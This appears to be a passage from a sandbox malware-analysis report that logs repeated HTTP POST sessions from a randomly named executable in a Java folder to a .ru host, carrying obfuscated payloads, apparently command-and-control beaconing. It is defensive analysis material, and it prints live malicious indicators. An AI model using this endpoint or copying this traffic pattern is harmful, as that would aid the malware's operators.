                                                                                                                  Jan 1, 2025 15:02:30.024802923 CET1072OUTData Raw: 50 53 58 50 5f 59 54 5a 55 5a 54 59 51 52 55 56 58 53 5c 55 59 55 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXP_YTZUZTYQRUVXS\UYUR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+<1]4%[1>>4&'2-40?1$??^8.<-<V*,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:30.124504089 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:30.388788939 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:30 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yw9dLClXNBupdXk6cDJ65Pp2s6Sj0b2Sftku0Ng97ztuNBv%2F20V88BCYyEmyWaMLw%2FaK%2FhMylVZKUY4lg04nwShU4HSA1eyQQMxGea3CAANhPiMsUtpPOds5XzBUDlmQRWtJKoI2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c21f92643f7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4339&min_rtt=1847&rtt_var=5678&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=67009&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.449768104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:30.514766932 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:30.868555069 CET1072OUTData Raw: 55 57 58 51 5a 59 54 5e 55 5a 54 59 51 52 55 50 58 59 5c 5e 59 53 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWXQZYT^UZTYQRUPXY\^YSR_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <-#+"&>:(>0$2-' $.Q$'X-=??$U)<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:30.960504055 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:31.135643005 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKY87y9ijW79UPCNBuTFI3V2Hves%2FnM3184MM9LIKCGNOqArZIl058DeQi8qJ47Im%2B3XckH1iVbzPG8OjX45P%2F04VX4QC6ET9W3dGx%2FAWHGWBivWB6tbZPeono49Su4cmr3JyaCt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c273f681895-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1508&rtt_var=618&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=849825&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.449769104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:31.266402960 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:31.618678093 CET1072OUTData Raw: 50 55 5d 51 5f 59 54 59 55 5a 54 59 51 59 55 56 58 5c 5c 5e 59 51 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]Q_YTYUZTYQYUVX\\^YQR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?1[7;%_&>>>?Y34:V:$%<"',=4]<= U*#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:31.739553928 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:32.011548042 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4yN48XvALbfU7qpFpSOysNIyv45nCTzrVnQz%2BLtUCDLEgjPKIcxF6HDkd2%2Fe216wC1jvCYY9pnNoHZFJHWUGthr49qB%2FJHwlqsEzOqC0BLe1zUykPgjkcnQ%2B5uMFvvp8Ocq7kbKw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c2c08d4726f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8078&min_rtt=2024&rtt_var=12868&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=28933&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.449770104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:32.143732071 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:32.493655920 CET1072OUTData Raw: 55 57 58 5c 5a 5a 51 5a 55 5a 54 59 51 5d 55 55 58 5a 5c 5c 59 55 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UWX\ZZQZUZTYQ]UUXZ\\YUR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (,* 2&X5>Z0B9:$X0?W0Z,,;<*#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:32.591629982 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:32.848536015 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:32 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=skM0f1boFUlui2%2BLAlR95aMTxdGZOOk3lYojijnvbZAAg5egcnEorJc0HuPDj5n98BYntEwQzv6kLCdyh%2BXdOlC4rdbrp%2FDDD%2BjrD42iWWeLOi0d9RzQDMZ1J%2FbMMpoXfvB0N31l"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c316d657cee-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8203&min_rtt=1911&rtt_var=13300&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27944&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.449771104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:32.984209061 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:33.337678909 CET1072OUTData Raw: 55 54 58 56 5f 5a 51 58 55 5a 54 59 51 53 55 57 58 5c 5c 5d 59 56 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXV_ZQXUZTYQSUWX\\]YVRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<,2 2Z>=0'&.$'32V&,Y->?$S><#^!'^)
                                                                                                                  Jan 1, 2025 15:02:33.447755098 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:33.630218029 CET815INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:33 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8E2A1TYi491cI%2FhBcCofd9jUzkCqD%2BVwdLWnGNQGiGktCpuRmhW2wzAZnywCxz9E%2F%2FQ7YzwLLM4zHXCs50YqPsoRhVsewW%2BlxomlqSoFr4dwBG%2B6Z8b2b9nJlIpVp%2BleKr7dS%2F8i"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c36bd259e16-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3342&min_rtt=2045&rtt_var=3361&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=117523&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.449772104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:33.765918016 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:34.118796110 CET1072OUTData Raw: 50 51 58 53 5a 58 54 59 55 5a 54 59 51 58 55 54 58 5e 5c 54 59 5c 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXSZXTYUZTYQXUTX^\TY\RZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/"7]>&)+Z3$"U:+3%$Z$;=?<8(,#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:34.210144997 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:34.393392086 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FofhPKK8lJ1py%2F9tQaPoFj0eTl4KBsLRBUkQj1BqOcSDfxRT8q7fy%2FYgkZbdJkr6aXR124SFrDPo8AEJeYTB%2FN0qzI7pvAgVa87YqVk7nihtfgikE%2FBBseHhD2KQIBLjZX6WUxef"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c3b8bb68c0c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1923&rtt_var=834&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=614478&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.449773104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:34.541537046 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:34.899904966 CET1072OUTData Raw: 50 55 58 53 5a 5c 51 5e 55 5a 54 59 51 59 55 53 58 5e 5c 5d 59 53 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXSZ\Q^UZTYQYUSX^\]YSR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ +<!Y#%>5)#3'1:''%?%0Z<;>/<(=<#^!'^)/
                                                                                                                  Jan 1, 2025 15:02:34.986599922 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:35.244199991 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TB29a6AcEAPlllDrKb9g1PA8%2BFldnzme414efeIR%2F%2FnwUGNdILgScL3PG2EI0PAmh1qjdRHE%2FVAceZAboINxyEB%2FrMaJpu0mjFg9ym6HSvG6QYJS0gCdOSJHV3wWCIFYxZ4AR4M2"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c406e6dc42a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2119&min_rtt=1472&rtt_var=1846&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=219614&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.449774104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:35.312424898 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.449775104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:35.371989012 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:35.728172064 CET1072OUTData Raw: 50 55 5d 54 5f 5a 51 59 55 5a 54 59 51 5e 55 54 58 52 5c 5d 59 5d 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]T_ZQYUZTYQ^UTXR\]Y]R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^+>!;1-9\>00-$8]3.U0Z#/8_(-<>#^!'^)3
                                                                                                                  Jan 1, 2025 15:02:35.830029964 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:35.993623972 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:35 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xo5cZNCjdmpvO1AeJwJ91HBRNF2JEpno7CSdSsOphuNyGmCmfeUvwRHkJgU%2BileFJjHTchvPjdvNyT68vHibLAY12Ka0VmzI6%2BByfyCbXbI40spm8LuDyPylaQssx5e5RL89VrNF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c45ae3943af-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3760&min_rtt=1771&rtt_var=4642&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=82560&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.449776104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:36.121766090 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:36.477971077 CET1072OUTData Raw: 55 57 5d 51 5a 5e 54 5f 55 5a 54 59 51 5a 55 55 58 5b 5c 5c 59 52 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]QZ^T_UZTYQZUUX[\\YRRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (=4(=1"=>0B>U.7(X'U&?;[;?=8*,#^!'^)#
                                                                                                                  Jan 1, 2025 15:02:36.566731930 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:36.829408884 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MhIVHgEWaxu%2F%2BL7OL%2F7LLNLVVpbLooX92%2FDbPwzWfm2dxpO4WcDHXNfI%2Bi10JUtiIh1%2BFZ6rfadXaMPkVeLLmxPnmc9iomEIfLxvvUE5F1L%2BKThLt2Af2fLjSi4%2FW0gh4G749P3U"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30c4a480cc44f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1915&min_rtt=1518&rtt_var=1364&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=310836&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:02:36.918787003 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
